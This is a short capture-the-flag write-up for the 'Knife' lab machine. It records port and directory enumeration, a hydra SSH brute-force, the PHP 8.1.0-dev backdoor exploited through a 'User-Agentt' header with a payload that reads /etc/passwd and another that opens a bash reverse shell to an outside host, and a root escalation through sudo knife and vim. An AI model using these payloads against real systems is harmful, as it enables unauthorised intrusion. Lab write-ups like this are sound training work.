Knife

Personal Rating: Easy

Enumeration

Starting off with basic enum:

  • Open Ports: 22, 80

  • webserver: Apache httpd 2.4.41

  • ssh server: OpenSSH 8.2p1

dirb scan: http://10.10.10.242/index.php

http://10.10.10.242/server-status //403

http://10.10.10.242/icons //same as index

http://10.10.10.242/icons/small //same as index

The sourcecode of index has interesting parts at the end, is it possibly injectable?

I found this path.getBoundingClientRect();

I also started an ssh bruteforce with hydra, just to have it running in the background

Wappalyzer plugin: PHP 8.1.0, Apache 2.4.41, Google Font API, Ubuntu

PHP RCE

This php remote code execution exploit worked after checking the php version:

LogoPHP 8.1.0-dev - 'User-Agentt' Remote Code ExecutionExploit Database

This exploit was a php backdoor and the payload was very simple:

User-Agentt: zerodiumsystem("cat /etc/passwd");

User-Agentt: zerodiumsystem("bash -c 'bash -i >& /dev/tcp/10.10.16.7/4444 0>&1'");

Custom Script 'chef' PE

I got the user james. I found an SUID binary as well: ./opt/chef-workstation/bin/knife

Looking through the "knife" script, I found "chef 16.10.8", which is vulnerable to a privilege escalation.

https://www.sourceclear.com/vulnerability-database/security/privilege-escalation/ruby/sid-1287www.sourceclear.com

This was the final payload, which was simple too:

sudo /usr/bin/knife client create detlef -e vim

	:!/bin/bash

# python3 -c ‘import pty; pty.spawn("/bin/bash")’
PreviousKeeperNextLame

Last updated